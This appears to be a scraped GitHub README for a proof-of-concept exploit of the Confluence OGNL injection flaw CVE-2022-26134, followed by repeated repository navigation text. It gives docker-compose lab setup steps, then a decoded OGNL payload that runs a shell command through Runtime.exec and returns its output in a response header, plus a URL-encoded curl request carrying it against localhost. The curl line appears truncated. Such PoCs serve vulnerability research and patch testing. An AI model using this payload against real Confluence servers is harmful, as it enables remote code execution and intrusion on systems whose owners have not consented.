POC - Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)

Tested on Confluence Version 7.13.6

Setting up environment

Clone the repository

docker-compose up -d

On http://localhost:8090 you shall see confluence up and running.
Next, get an evaluation license for Confluence and setup the database with database name confluence, username postgres and password root.

Exploit

Decoded payload

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Curl request

curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%

POC

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
LICENSE		LICENSE
README.md		README.md
confluence0day.PNG		confluence0day.PNG
docker-compose.yml		docker-compose.yml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

LICENSE

LICENSE

README.md

README.md

confluence0day.PNG

confluence0day.PNG

docker-compose.yml

docker-compose.yml

Repository files navigation

POC - Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)

Tested on Confluence Version 7.13.6

Setting up environment

Exploit

About

License

ColdFusionX/CVE-2022-26134

Folders and files

Latest commit

History

Repository files navigation

POC - Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)

Tested on Confluence Version 7.13.6

Setting up environment

Exploit

About

Topics

Resources

License

Stars

Watchers

Forks